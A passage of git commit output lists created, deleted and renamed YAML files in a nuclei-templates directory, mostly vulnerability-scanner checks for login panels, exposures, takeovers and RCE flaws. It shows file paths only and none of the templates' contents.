nuclei-templates/Other/sensitive-storage-data-exposure-2.yaml create mode 100644 nuclei-templates/Other/sensitive-storage-data-exposure-3.yaml create mode 100644 nuclei-templates/Other/sensitive-storage-data-exposure-4.yaml create mode 100644 nuclei-templates/Other/sensitive-storage-data-exposure-5.yaml create mode 100644 nuclei-templates/Other/sensitive-storage-data-exposure-6.yaml rename nuclei-templates/Other/{sensitive-storage-exposure-10143.yaml => sensitive-storage-exposure.yaml} (100%) create mode 100644 nuclei-templates/Other/seowon-router-rce-10147.yaml delete mode 100644 nuclei-templates/Other/seowon-router-rce.yaml create mode 100644 nuclei-templates/Other/sequoiadb-default-login-10150.yaml delete mode 100644 nuclei-templates/Other/sequoiadb-default-login.yaml rename nuclei-templates/Other/{server-backup-login.yaml => server-backup-login-10156.yaml} (100%) delete mode 100644 nuclei-templates/Other/server-backup-manager-se-login-detect.yaml create mode 100644 nuclei-templates/Other/server-backup-manager-se.yaml create mode 100644 nuclei-templates/Other/server-status-localhost-10165.yaml delete mode 100644 nuclei-templates/Other/server-status-localhost.yaml create mode 100644 nuclei-templates/Other/servfail-refused-hosts-10167.yaml delete mode 100644 nuclei-templates/Other/servfail-refused-hosts.yaml rename nuclei-templates/Other/{servicedesk-login-panel-10171.yaml => servicedesk-login-panel-10173.yaml} (100%) rename nuclei-templates/Other/{servicenow-helpdesk-credential.yaml => servicenow-helpdesk-credential-10175.yaml} (100%) delete mode 100644 nuclei-templates/Other/setPreferences-xss.yaml rename nuclei-templates/Other/{sgp-login-panel.yaml => sgp-login-panel-10185.yaml} (100%) create mode 100644 nuclei-templates/Other/sharecenter-login-10189.yaml delete mode 100644 nuclei-templates/Other/sharecenter-login-10190.yaml create mode 100644 nuclei-templates/Other/shell-history-10191.yaml delete mode 100644 nuclei-templates/Other/shell-history.yaml rename nuclei-templates/Other/{Shipped100-sqli.yaml => shipped100-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/shopify-custom-token.yaml rename nuclei-templates/Other/{shopify-private-token-10199.yaml => shopify-private-token(1).yaml} (100%) create mode 100644 nuclei-templates/Other/shopify-shared-secret(1).yaml delete mode 100644 nuclei-templates/Other/shopify-shared-secret.yaml rename nuclei-templates/Other/{shopify-takeover-10202.yaml => shopify-takeover-10203.yaml} (100%) rename nuclei-templates/Other/{shoppable-token.yaml => shoppable-token-10209.yaml} (100%) create mode 100644 nuclei-templates/Other/shopware-detect-10213.yaml delete mode 100644 nuclei-templates/Other/shopware-detect.yaml create mode 100644 nuclei-templates/Other/shopxo.yaml create mode 100644 nuclei-templates/Other/short-io-takeover.yaml delete mode 100644 nuclei-templates/Other/short-io.yaml create mode 100644 nuclei-templates/Other/shortcode-lfi-10214.yaml delete mode 100644 nuclei-templates/Other/shortcode-lfi.yaml delete mode 100644 nuclei-templates/Other/shoutcast-server-10217.yaml create mode 100644 nuclei-templates/Other/shoutcast-server.yaml delete mode 100644 nuclei-templates/Other/showdoc-default-login-10221.yaml create mode 100644 nuclei-templates/Other/showdoc-default-login.yaml rename nuclei-templates/Other/{showdoc-file-upload-rce-10229.yaml => showdoc-file-upload-rce-10226.yaml} (100%) create mode 100644 nuclei-templates/Other/sick-beard-xss-10233.yaml delete mode 100644 nuclei-templates/Other/sick-beard-xss.yaml create mode 100644 nuclei-templates/Other/sidekiq-dashboard-10236.yaml delete mode 100644 nuclei-templates/Other/sidekiq-dashboard.yaml create mode 100644 nuclei-templates/Other/sigma_wide.yaml create mode 100644 nuclei-templates/Other/signatures-10259.yaml rename nuclei-templates/Other/{liferay.yaml => signatures-10266.yaml} (100%) create mode 100644 nuclei-templates/Other/simple-crm-sql-injection-10278.yaml delete mode 100644 nuclei-templates/Other/simple-crm-sql-injection.yaml create mode 100644 nuclei-templates/Other/simple-employee-rce-10279.yaml delete mode 100644 nuclei-templates/Other/simple-employee-rce.yaml create mode 100644 nuclei-templates/Other/site-map-sql-injection.yaml rename nuclei-templates/Other/{sitecore-login-10287.yaml => sitecore-login-10289.yaml} (100%) create mode 100644 nuclei-templates/Other/sitecore-version-10291.yaml delete mode 100644 nuclei-templates/Other/sitecore-version.yaml rename nuclei-templates/Other/{SiteCore.yaml => sitecore.yaml} (100%) delete mode 100644 nuclei-templates/Other/sitemap-sql-injection.yaml rename nuclei-templates/Other/{skycaiji-admin-panel-10304.yaml => skycaiji-admin-panel-10306.yaml} (100%) create mode 100644 nuclei-templates/Other/skycaiji-install-10309.yaml delete mode 100644 nuclei-templates/Other/skycaiji-install.yaml create mode 100644 nuclei-templates/Other/slack-bot-token-10310.yaml delete mode 100644 nuclei-templates/Other/slack-bot-token-10313.yaml rename nuclei-templates/Other/{slocum-login.yaml => slocum-login-10317.yaml} (100%) create mode 100644 nuclei-templates/Other/smartling-takeover-10327.yaml delete mode 100644 nuclei-templates/Other/smartling-takeover.yaml create mode 100644 nuclei-templates/Other/smartsense-default-login-10331.yaml delete mode 100644 nuclei-templates/Other/smartsense-default-login.yaml create mode 100644 nuclei-templates/Other/smugmug-takeover-10340.yaml delete mode 100644 nuclei-templates/Other/smugmug-takeover.yaml rename nuclei-templates/Other/{sniplets-lfi.yaml => sniplets-lfi-10343.yaml} (100%) rename nuclei-templates/Other/{sniplets-xss.yaml => sniplets-xss-10344.yaml} (100%) create mode 100644 nuclei-templates/Other/snyk-ignore-file-disclosure-10347.yaml delete mode 100644 nuclei-templates/Other/snyk-ignore-file-disclosure.yaml create mode 100644 nuclei-templates/Other/sofneta-mecdream-pacs-lfi-10351.yaml delete mode 100644 nuclei-templates/Other/sofneta-mecdream-pacs-lfi.yaml create mode 100644 nuclei-templates/Other/solarwinds-default-admin-1.yaml create mode 100644 nuclei-templates/Other/solarwinds-default-login-10354.yaml delete mode 100644 nuclei-templates/Other/solarwinds-default-login.yaml delete mode 100644 nuclei-templates/Other/solarwinds-orion-10357.yaml create mode 100644 nuclei-templates/Other/solarwinds-orion-10359.yaml rename nuclei-templates/Other/{solarwinds-servuftp-detect.yaml => solarwinds-servuftp-detect-10360.yaml} (100%) rename nuclei-templates/Other/{solr-fileRead.yaml => solr-fileread.yaml} (100%) rename nuclei-templates/Other/{somfy-login-10371.yaml => somfy-login-10373.yaml} (100%) create mode 100644 nuclei-templates/Other/sonarqube-token-10382.yaml delete mode 100644 nuclei-templates/Other/sonarqube-token.yaml delete mode 100644 nuclei-templates/Other/sonicwall-management-panel-10387.yaml create mode 100644 nuclei-templates/Other/sonicwall-management-panel.yaml rename nuclei-templates/Other/{sonicwall-sslvpn-panel.yaml => sonicwall-sslvpn-panel-10388.yaml} (100%) create mode 100644 nuclei-templates/Other/sonicwall-sslvpn-shellshock-10393.yaml delete mode 100644 nuclei-templates/Other/sonicwall-sslvpn-shellshock.yaml rename nuclei-templates/Other/{sophos-fw-version-detect.yaml => sophos-fw-version-detect-10397.yaml} (100%) create mode 100644 nuclei-templates/Other/spark-webui-unauth-10401.yaml delete mode 100644 nuclei-templates/Other/spark-webui-unauth.yaml create mode 100644 nuclei-templates/Other/spectracom-default-login-10405.yaml delete mode 100644 nuclei-templates/Other/spectracom-default-login.yaml rename nuclei-templates/Other/{sphider-login.yaml => sphider-login-10408.yaml} (100%) create mode 100644 nuclei-templates/Other/spidercontrol-scada-server-info-10411.yaml delete mode 100644 nuclei-templates/Other/spidercontrol-scada-server-info.yaml delete mode 100644 nuclei-templates/Other/splunk-enterprise-login-panel.yaml create mode 100644 nuclei-templates/Other/splunk-enterprise-panel-10415.yaml rename nuclei-templates/Other/{splunk-login.yaml => splunk-login-10419.yaml} (100%) create mode 100644 nuclei-templates/Other/spotify.yaml rename nuclei-templates/Other/{nginx_Misconfiguration.yaml => spring_collection.yaml} (100%) rename nuclei-templates/Other/{springboot-actuator-10434.yaml => springboot-actuator-10433.yaml} (100%) create mode 100644 nuclei-templates/Other/springboot-actuators-jolokia-xxe-10432.yaml delete mode 100644 nuclei-templates/Other/springboot-actuators-jolokia-xxe.yaml create mode 100644 nuclei-templates/Other/springboot-env-10450.yaml delete mode 100644 nuclei-templates/Other/springboot-env.yaml create mode 100644 nuclei-templates/Other/springboot-gateway-10453.yaml delete mode 100644 nuclei-templates/Other/springboot-gateway.yaml create mode 100644 nuclei-templates/Other/springboot-health-10459.yaml delete mode 100644 nuclei-templates/Other/springboot-health.yaml create mode 100644 nuclei-templates/Other/springboot-heapdump-10465.yaml create mode 100644 nuclei-templates/Other/springboot-httptrace-10467.yaml delete mode 100644 nuclei-templates/Other/springboot-httptrace.yaml delete mode 100644 nuclei-templates/Other/springboot-info-10470.yaml create mode 100644 nuclei-templates/Other/springboot-info-10471.yaml create mode 100644 nuclei-templates/Other/springboot-log4j-rce-10474.yaml delete mode 100644 nuclei-templates/Other/springboot-log4j-rce.yaml create mode 100644 nuclei-templates/Other/springboot-metrics-10482.yaml create mode 100644 nuclei-templates/Other/springboot-threaddump-10485.yaml delete mode 100644 nuclei-templates/Other/springboot-threaddump.yaml delete mode 100644 nuclei-templates/Other/springboot-trace-10492.yaml create mode 100644 nuclei-templates/Other/springboot-trace.yaml create mode 100644 nuclei-templates/Other/sprintful-takeover-10495.yaml delete mode 100644 nuclei-templates/Other/sprintful-takeover.yaml create mode 100644 nuclei-templates/Other/sql-dump-10496.yaml delete mode 100644 nuclei-templates/Other/sql-dump.yaml create mode 100644 nuclei-templates/Other/sql-server-reporting-10508.yaml delete mode 100644 nuclei-templates/Other/sql-server-reporting.yaml delete mode 100644 nuclei-templates/Other/sqli-error-based.yaml rename nuclei-templates/Other/{squirrelmail-add-xss.yaml => squirrelmail-add-xss-10515.yaml} (100%) delete mode 100644 nuclei-templates/Other/squirrelmail-login-10519.yaml create mode 100644 nuclei-templates/Other/squirrelmail-login-10521.yaml rename nuclei-templates/Other/{ssh-authorized-keys.yaml => ssh-authorized-keys-10523.yaml} (100%) delete mode 100644 nuclei-templates/Other/ssti.yaml create mode 100644 nuclei-templates/Other/stackstorm-default-login-10530.yaml delete mode 100644 nuclei-templates/Other/stackstorm-default-login.yaml rename nuclei-templates/Other/{stem-audio-table-private-keys-10535.yaml => stem-audio-table-private-keys-10534.yaml} (100%) create mode 100644 nuclei-templates/Other/steve.yaml rename nuclei-templates/Other/{strapi-documentation.yaml => strapi-documentation-10543.yaml} (100%) rename nuclei-templates/Other/{2904374066.yaml => stratum.yaml} (100%) create mode 100644 nuclei-templates/Other/streampipes.yaml create mode 100644 nuclei-templates/Other/strikingly-takeover-10551.yaml delete mode 100644 nuclei-templates/Other/strikingly-takeover.yaml rename nuclei-templates/Other/{stripe-api-key.yaml => stripe-api-key-11869.yaml} (100%) rename nuclei-templates/Other/{stripe-restricted-key.yaml => stripe-restricted-key-10555.yaml} (100%) delete mode 100755 nuclei-templates/Other/stripe-secret-key-10556.yaml create mode 100644 nuclei-templates/Other/stripe-secret-key-10558.yaml create mode 100644 nuclei-templates/Other/struts-problem-report-10564.yaml delete mode 100644 nuclei-templates/Other/struts-problem-report.yaml create mode 100644 nuclei-templates/Other/subdomain-takeover-dns-10566.yaml delete mode 100644 nuclei-templates/Other/subdomain-takeover-dns.yaml create mode 100644 nuclei-templates/Other/subdomain-takeover.yaml create mode 100644 nuclei-templates/Other/submitty-login-10568.yaml delete mode 100644 nuclei-templates/Other/submitty-login.yaml rename nuclei-templates/Other/{supervpn-panel.yaml => supervpn-panel-10575.yaml} (100%) rename nuclei-templates/Other/{urge-takeover.yaml => surge-takeover-10579.yaml} (100%) rename nuclei-templates/Other/{svnserve-config.yaml => svnserve-config-10590.yaml} (100%) create mode 100644 nuclei-templates/Other/swagger-api-10593.yaml create mode 100644 nuclei-templates/Other/swagger-api-11.yaml delete mode 100644 nuclei-templates/Other/symantec-dlp-login-10596.yaml create mode 100644 nuclei-templates/Other/symantec-dlp-login.yaml create mode 100644 nuclei-templates/Other/symantec-epm-login-10602.yaml delete mode 100644 nuclei-templates/Other/symantec-epm-login.yaml delete mode 100644 nuclei-templates/Other/symantec-ewep-login-10603.yaml create mode 100644 nuclei-templates/Other/symantec-ewep-login.yaml create mode 100644 nuclei-templates/Other/symantec-messaging-gateway.yaml rename nuclei-templates/Other/{symfony-database-config.yaml => symfony-database-config-10615.yaml} (100%) create mode 100644 nuclei-templates/Other/symfony-profiler-10625.yaml delete mode 100644 nuclei-templates/Other/symfony-profiler.yaml create mode 100644 nuclei-templates/Other/symfonyrce.yaml create mode 100644 nuclei-templates/Other/szhe-default-login-10636.yaml delete mode 100644 nuclei-templates/Other/szhe-default-login.yaml create mode 100644 nuclei-templates/Other/t24.yaml delete mode 100644 nuclei-templates/Other/tableau-panel-10641.yaml create mode 100644 nuclei-templates/Other/tableau-panel-10642.yaml delete mode 100644 nuclei-templates/Other/tableau-server-detect-10643.yaml create mode 100644 nuclei-templates/Other/tableau-server-detect.yaml create mode 100644 nuclei-templates/Other/tabnabbing-check-10646.yaml delete mode 100644 nuclei-templates/Other/tabnabbing-check.yaml create mode 100644 nuclei-templates/Other/tamronos-rce-10651.yaml delete mode 100644 nuclei-templates/Other/tamronos-rce.yaml create mode 100644 nuclei-templates/Other/tamronos.yaml rename nuclei-templates/Other/{targa-camera-lfi.yaml => targa-camera-lfi-10654.yaml} (100%) create mode 100644 nuclei-templates/Other/tave-takeover-10660.yaml delete mode 100644 nuclei-templates/Other/tave-takeover.yaml create mode 100644 nuclei-templates/Other/tcp.yaml rename nuclei-templates/Other/{tcpconfig.yaml => tcpconfig-10665.yaml} (100%) rename nuclei-templates/Other/{tech-detect.yaml => tech-detect-10673.yaml} (100%) rename nuclei-templates/Other/{tectuus-scada-monitor-10681.yaml => tectuus-scada-monitor-10679.yaml} (100%) create mode 100644 nuclei-templates/Other/tekon-info-leak-10684.yaml delete mode 100644 nuclei-templates/Other/tekon-info-leak.yaml rename nuclei-templates/Other/{telerik-dialoghandler-detect-10689.yaml => telerik-dialoghandler-detect-10691.yaml} (100%) create mode 100644 nuclei-templates/Other/telerik-fileupload-detect-10693.yaml delete mode 100644 nuclei-templates/Other/telerik-fileupload-detect-10696.yaml create mode 100644 nuclei-templates/Other/telerik_report_server.yaml delete mode 100644 nuclei-templates/Other/teradici-pcoip-10703.yaml create mode 100644 nuclei-templates/Other/teradici-pcoip-10704.yaml rename nuclei-templates/Other/{terraform-detect.yaml => terraform-detect-10707.yaml} (100%) create mode 100644 nuclei-templates/Other/terraform-enterprise-panel-10712.yaml delete mode 100644 nuclei-templates/Other/terraform-enterprise-panel.yaml create mode 100644 nuclei-templates/Other/thinkcmf-detection-10719.yaml delete mode 100644 nuclei-templates/Other/thinkcmf-detection.yaml create mode 100644 nuclei-templates/Other/thinkcmf-lfi-10721.yaml delete mode 100644 nuclei-templates/Other/thinkcmf-lfi.yaml delete mode 100644 nuclei-templates/Other/thinkcmf-rce-10728.yaml create mode 100644 nuclei-templates/Other/thinkcmf-rce-10729.yaml rename nuclei-templates/Other/{thinkcmf-workflow-10730.yaml => thinkcmf-workflow-10731.yaml} (100%) rename nuclei-templates/Other/{thinkific-redirect.yaml => thinkific-redirect-10734.yaml} (100%) create mode 100644 nuclei-templates/Other/thinkphp-2-rce-10738.yaml delete mode 100644 nuclei-templates/Other/thinkphp-2-rce-10741.yaml delete mode 100644 nuclei-templates/Other/thinkphp-501-rce-10743.yaml create mode 100644 nuclei-templates/Other/thinkphp-501-rce.yaml create mode 100644 nuclei-templates/Other/thinkphp-5022-rce-10744.yaml delete mode 100644 nuclei-templates/Other/thinkphp-5022-rce-10747.yaml create mode 100644 nuclei-templates/Other/thinkphp-5023-rce-10748.yaml delete mode 100644 nuclei-templates/Other/thinkphp-5023-rce.yaml delete mode 100644 nuclei-templates/Other/thinkphp-509-information-disclosure-10752.yaml create mode 100644 nuclei-templates/Other/thinkphp-509-information-disclosure-10753.yaml rename nuclei-templates/Other/{threatq-login-10756.yaml => threatq-login.yaml} (100%) create mode 100644 nuclei-templates/Other/tianqing-info-leak-10765.yaml delete mode 100644 nuclei-templates/Other/tianqing-info-leak.yaml create mode 100644 nuclei-templates/Other/tictail-takeover-10768.yaml delete mode 100644 nuclei-templates/Other/tictail-takeover.yaml create mode 100644 nuclei-templates/Other/tikiwiki-cms-10775.yaml delete mode 100644 nuclei-templates/Other/tikiwiki-cms.yaml delete mode 100644 nuclei-templates/Other/tikiwiki-json-rpc.yaml rename nuclei-templates/Other/{tikiwiki-reflected-xss-10778.yaml => tikiwiki-reflected-xss.yaml} (100%) rename nuclei-templates/Other/{tilda-takeover.yaml => tilda-takeover-10782.yaml} (100%) delete mode 100644 nuclei-templates/Other/tileserver-gl-10786.yaml create mode 100644 nuclei-templates/Other/tileserver-gl-10787.yaml create mode 100644 nuclei-templates/Other/tinyfilemanager.yaml create mode 100644 nuclei-templates/Other/tomcat-detect-10794.yaml delete mode 100644 nuclei-templates/Other/tomcat-detect.yaml delete mode 100644 nuclei-templates/Other/tomcat-examples-login.yaml create mode 100644 nuclei-templates/Other/tomcat-examples-login_CVE-2022-34305.yaml create mode 100644 nuclei-templates/Other/tomcat-manager-pathnormalization-1.yaml create mode 100644 nuclei-templates/Other/tomcat-manager-pathnormalization-2.yaml rename nuclei-templates/Other/{tomcat-manager-pathnormalization-10796.yaml => tomcat-manager-pathnormalization.yaml} (100%) rename nuclei-templates/Other/{tomcat-scripts.yaml => tomcat-scripts-10802.yaml} (100%) create mode 100644 nuclei-templates/Other/tooljet.yaml create mode 100644 nuclei-templates/Other/top-xss-params-10807.yaml delete mode 100644 nuclei-templates/Other/top-xss-params.yaml create mode 100644 nuclei-templates/Other/topsec-topacm-rce.yaml rename nuclei-templates/Other/{tor-socks-proxy-10811.yaml => tor-socks-proxy.yaml} (100%) delete mode 100644 nuclei-templates/Other/total-web-10816.yaml create mode 100644 nuclei-templates/Other/total-web.yaml rename nuclei-templates/Other/{tpshop-directory-traversal-10823.yaml => tpshop-directory-traversal-10822.yaml} (100%) create mode 100644 nuclei-templates/Other/traccar.yaml rename nuclei-templates/Other/{trace-axd-detect-10826.yaml => trace-axd-detect-10825.yaml} (100%) create mode 100644 nuclei-templates/Other/trace-method-10829.yaml delete mode 100644 nuclei-templates/Other/trace-method.yaml create mode 100644 nuclei-templates/Other/traefik-dashboard-10832.yaml delete mode 100644 nuclei-templates/Other/traefik-dashboard.yaml delete mode 100644 nuclei-templates/Other/trilithic-viewpoint-default.yaml create mode 100644 nuclei-templates/Other/trilithic-viewpoint-login.yaml create mode 100644 nuclei-templates/Other/triton-lite.yaml delete mode 100644 nuclei-templates/Other/tugboat-config-exposure-10843.yaml create mode 100644 nuclei-templates/Other/tugboat-config-exposure-10844.yaml create mode 100644 nuclei-templates/Other/tumblr-takeover-10846.yaml delete mode 100644 nuclei-templates/Other/tumblr-takeover.yaml create mode 100644 nuclei-templates/Other/turbocrm-xss-10848.yaml delete mode 100644 nuclei-templates/Other/turbocrm-xss-10850.yaml create mode 100644 nuclei-templates/Other/turbomeeting.yaml rename nuclei-templates/Other/{tuxedo-connected-controller-10853.yaml => tuxedo-connected-controller-10852.yaml} (100%) create mode 100644 nuclei-templates/Other/tweaker5.yaml delete mode 100644 nuclei-templates/Other/twig-php-ssti-10858.yaml create mode 100644 nuclei-templates/Other/twig-php-ssti-10859.yaml delete mode 100644 nuclei-templates/Other/twilio-api-10860.yaml create mode 100644 nuclei-templates/Other/twilio-api-10861.yaml create mode 100644 nuclei-templates/Other/twitter-secret-11870.yaml delete mode 100644 nuclei-templates/Other/twitter-secret.yaml rename nuclei-templates/Other/{txt-fingerprint.yaml => txt-fingerprint-10863.yaml} (100%) delete mode 100644 nuclei-templates/Other/uberflip-takeover-10864.yaml create mode 100644 nuclei-templates/Other/uberflip-takeover.yaml delete mode 100644 nuclei-templates/Other/ucmdb-default-login-10869.yaml create mode 100644 nuclei-templates/Other/ucmdb-default-login.yaml rename nuclei-templates/Other/{umbraco-base-ssrf.yaml => umbraco-base-ssrf-10882.yaml} (100%) rename nuclei-templates/Other/{signatures-10251.yaml => umbraco.yaml} (100%) rename nuclei-templates/Other/{unauth-ftp-10942.yaml => unauth-ftp-10940.yaml} (100%) rename nuclei-templates/Other/{unauth-hoteldruid-panel.yaml => unauth-hoteldruid-panel-10943.yaml} (100%) rename nuclei-templates/Other/{unauth-message-read.yaml => unauth-message-read-10947.yaml} (100%) create mode 100644 nuclei-templates/Other/unauth-rlm-10960.yaml delete mode 100644 nuclei-templates/Other/unauth-rlm.yaml create mode 100644 nuclei-templates/Other/unauth-spark-api-10963.yaml delete mode 100644 nuclei-templates/Other/unauth-spark-api.yaml create mode 100644 nuclei-templates/Other/unauth-xproxy-dashboard-10968.yaml delete mode 100644 nuclei-templates/Other/unauth-xproxy-dashboard.yaml rename nuclei-templates/Other/{unauthenticated-airflow-10886.yaml => unauthenticated-airflow-10884.yaml} (100%) delete mode 100644 nuclei-templates/Other/unauthenticated-alert-manager-10890.yaml create mode 100644 nuclei-templates/Other/unauthenticated-alert-manager-10892.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-frp-10897.yaml create mode 100644 nuclei-templates/Other/unauthenticated-frp.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-influxdb-10903.yaml create mode 100644 nuclei-templates/Other/unauthenticated-influxdb.yaml create mode 100644 nuclei-templates/Other/unauthenticated-lansweeper-10906.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-lansweeper.yaml rename nuclei-templates/Other/{unauthenticated-mongo-express-10908.yaml => unauthenticated-mongo-express-10909.yaml} (100%) rename nuclei-templates/Other/{unauthenticated-netdata.yaml => unauthenticated-netdata-10916.yaml} (100%) create mode 100644 nuclei-templates/Other/unauthenticated-popup-upload-10923.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-popup-upload.yaml rename nuclei-templates/Other/{unauthenticated-tensorboard.yaml => unauthenticated-tensorboard-10930.yaml} (100%) create mode 100644 nuclei-templates/Other/unauthenticated-zipkin-10935.yaml delete mode 100644 nuclei-templates/Other/unauthenticated-zipkin.yaml rename nuclei-templates/Other/{unauthenticated-zippkin.yaml => unauthenticated-zippkin-10937.yaml} (100%) create mode 100644 nuclei-templates/Other/unauthorized-plastic-scm-10957.yaml delete mode 100644 nuclei-templates/Other/unauthorized-plastic-scm.yaml delete mode 100644 nuclei-templates/Other/unauthorized-puppet-node-manager-detect-10959.yaml create mode 100644 nuclei-templates/Other/unauthorized-puppet-node-manager-detect.yaml rename nuclei-templates/Other/{unbounce-takeover-10971.yaml => unbounce-takeover-10970.yaml} (100%) create mode 100644 nuclei-templates/Other/unencrypted-bigip-ltm-cookie-10972.yaml create mode 100644 nuclei-templates/Other/unifi-network-log4j-rce-10976.yaml delete mode 100644 nuclei-templates/Other/unifi-network-log4j-rce.yaml create mode 100644 nuclei-templates/Other/unifi_network_application.yaml create mode 100644 nuclei-templates/Other/unified_communications_domain_manager.yaml delete mode 100644 nuclei-templates/Other/unpatched-coldfusion-10977.yaml create mode 100644 nuclei-templates/Other/unpatched-coldfusion.yaml create mode 100644 nuclei-templates/Other/ups-status-10984.yaml delete mode 100644 nuclei-templates/Other/ups-status.yaml create mode 100644 nuclei-templates/Other/usg1000_firmware.yaml create mode 100644 nuclei-templates/Other/vanguard-post-xss-10992.yaml delete mode 100644 nuclei-templates/Other/vanguard-post-xss.yaml create mode 100644 nuclei-templates/Other/vcenter_server.yaml create mode 100644 nuclei-templates/Other/vec40g.yaml create mode 100644 nuclei-templates/Other/vend-takeover-10997.yaml delete mode 100644 nuclei-templates/Other/vend-takeover.yaml create mode 100644 nuclei-templates/Other/versa-default-login-11003.yaml delete mode 100644 nuclei-templates/Other/versa-default-login.yaml delete mode 100644 nuclei-templates/Other/versa-sdwan-11005.yaml create mode 100644 nuclei-templates/Other/versa-sdwan.yaml create mode 100644 nuclei-templates/Other/versa_operating_system.yaml delete mode 100644 nuclei-templates/Other/vidyo-default-login-11008.yaml create mode 100644 nuclei-templates/Other/vidyo-default-login.yaml create mode 100644 nuclei-templates/Other/viewlinc-crlf-injection-11014.yaml delete mode 100644 nuclei-templates/Other/viewlinc-crlf-injection.yaml delete mode 100644 nuclei-templates/Other/viewpoint-system-status-11018.yaml create mode 100644 nuclei-templates/Other/viewpoint-system-status-11019.yaml delete mode 100644 nuclei-templates/Other/virtual-ema-detect-11025.yaml create mode 100644 nuclei-templates/Other/virtual-ema-detect.yaml create mode 100644 nuclei-templates/Other/visionhub-default-login-11029.yaml delete mode 100644 nuclei-templates/Other/visionhub-default-login.yaml delete mode 100644 nuclei-templates/Other/visual-tools-dvr-rce-11030.yaml create mode 100644 nuclei-templates/Other/visual-tools-dvr-rce-11032.yaml rename nuclei-templates/Other/{vmware-horizon.yaml => vmware-horizon-11038.yaml} (100%) create mode 100644 nuclei-templates/Other/vmware-horizon-log4j-jndi-rce-11033.yaml delete mode 100644 nuclei-templates/Other/vmware-horizon-log4j-jndi-rce-11034.yaml create mode 100644 nuclei-templates/Other/vmware-horizon-panel-11037.yaml delete mode 100644 nuclei-templates/Other/vmware-horizon-panel.yaml rename nuclei-templates/Other/{vmware-vcenter-lfi.yaml => vmware-vcenter-lfi-11048.yaml} (100%) create mode 100644 nuclei-templates/Other/vmware-vcenter-lfi-linux-11042.yaml delete mode 100644 nuclei-templates/Other/vmware-vcenter-lfi-linux-11044.yaml delete mode 100644 nuclei-templates/Other/vmware-version-detect-11054.yaml create mode 100644 nuclei-templates/Other/vmware-version-detect.yaml rename nuclei-templates/Other/{vmware-vrealize-detect.yaml => vmware-vrealize-detect-11057.yaml} (100%) rename nuclei-templates/Other/{vmware-workflow.yaml => vmware-workflow-11060.yaml} (100%) create mode 100644 nuclei-templates/Other/vnc-detect-11062.yaml delete mode 100644 nuclei-templates/Other/vnc-detect.yaml rename nuclei-templates/Other/{voipmonitor-detect.yaml => voipmonitor-detect-11063.yaml} (100%) rename nuclei-templates/Other/{voipmonitor-workflow-11064.yaml => voipmonitor-workflow-11065.yaml} (100%) create mode 100644 nuclei-templates/Other/voyager.yaml delete mode 100644 nuclei-templates/Other/vpms-auth-bypass-11068.yaml create mode 100644 nuclei-templates/Other/vpms-auth-bypass.yaml create mode 100644 nuclei-templates/Other/vpn.yaml create mode 100644 nuclei-templates/Other/vrealize-operations-log4j-rce-11072.yaml delete mode 100644 nuclei-templates/Other/vrealize-operations-log4j-rce.yaml create mode 100644 nuclei-templates/Other/vrealize_operations.yaml create mode 100644 nuclei-templates/Other/vrealize_operations_manager.yaml rename nuclei-templates/Other/{vsftpd-detection.yaml => vsftpd-detection-11073.yaml} (100%) create mode 100644 nuclei-templates/Other/w3c-total-cache-ssrf-11080.yaml delete mode 100644 nuclei-templates/Other/w3c-total-cache-ssrf.yaml create mode 100644 nuclei-templates/Other/wadl-api-11084.yaml delete mode 100644 nuclei-templates/Other/wadl-api.yaml create mode 100644 nuclei-templates/Other/wamp-xdebug-detect-11100.yaml delete mode 100644 nuclei-templates/Other/wamp-xdebug-detect-11103.yaml rename nuclei-templates/Other/{wangkang-ngfw-rce.yaml => wangkang-NGFW-rce.yaml} (100%) rename nuclei-templates/Other/{wangkang-ns-asg-rce-1.yaml => wangkang-NS-ASG-rce-1.yaml} (100%) delete mode 100644 nuclei-templates/Other/watchguard-panel-11108.yaml create mode 100644 nuclei-templates/Other/watchguard-panel.yaml rename nuclei-templates/Other/{wazuh-detect.yaml => wazuh-detect-11111.yaml} (100%) delete mode 100644 nuclei-templates/Other/wazuh-panel-11113.yaml create mode 100644 nuclei-templates/Other/wazuh-panel.yaml create mode 100644 nuclei-templates/Other/wazuh.yaml delete mode 100644 nuclei-templates/Other/weatherlink-11115.yaml create mode 100644 nuclei-templates/Other/weatherlink-11117.yaml rename nuclei-templates/Other/{weave-scope-dashboard-detect.yaml => weave-scope-dashboard-detect-11118.yaml} (100%) create mode 100644 nuclei-templates/Other/web-config-11125.yaml delete mode 100644 nuclei-templates/Other/web-config.yaml create mode 100644 nuclei-templates/Other/web-ftp-detect-11136.yaml delete mode 100644 nuclei-templates/Other/web-ftp-detect.yaml create mode 100644 nuclei-templates/Other/web-local-craft-11141.yaml delete mode 100644 nuclei-templates/Other/web-local-craft.yaml create mode 100644 nuclei-templates/Other/web-suite-detect-11168.yaml delete mode 100644 nuclei-templates/Other/web-suite-detect.yaml create mode 100644 nuclei-templates/Other/webeditors-11129.yaml delete mode 100644 nuclei-templates/Other/webeditors.yaml create mode 100644 nuclei-templates/Other/webex_meetings_online.yaml create mode 100644 nuclei-templates/Other/webflow-takeover-11133.yaml delete mode 100644 nuclei-templates/Other/webflow-takeover.yaml rename nuclei-templates/Other/{weblogic-detect.yaml => weblogic-detect-11143.yaml} (100%) rename nuclei-templates/Other/{weblogic-iiop-detect.yaml => weblogic-iiop-detect-11148.yaml} (100%) create mode 100644 nuclei-templates/Other/weblogic-t3-detect-11153.yaml delete mode 100644 nuclei-templates/Other/weblogic-t3-detect.yaml rename nuclei-templates/Other/{weblogic-weak-login-11155.yaml => weblogic-weak-login-11156.yaml} (100%) create mode 100644 nuclei-templates/Other/webmin-panel-11158.yaml delete mode 100644 nuclei-templates/Other/webmin-panel.yaml create mode 100644 nuclei-templates/Other/webmodule-ee-11162.yaml delete mode 100644 nuclei-templates/Other/webmodule-ee-11164.yaml create mode 100644 nuclei-templates/Other/webmodule-ee-panel-11161.yaml delete mode 100644 nuclei-templates/Other/webmodule-ee-panel.yaml create mode 100644 nuclei-templates/Other/webpagetest.yaml create mode 100644 nuclei-templates/Other/websphere.yaml rename nuclei-templates/Other/{Webtalk-leakage.yaml => webtalk-leakage.yaml} (100%) create mode 100644 nuclei-templates/Other/webui-rce-11173.yaml delete mode 100644 nuclei-templates/Other/webui-rce.yaml rename nuclei-templates/Other/{webview-addjavascript-interface-11175.yaml => webview-addjavascript-interface-11177.yaml} (100%) create mode 100644 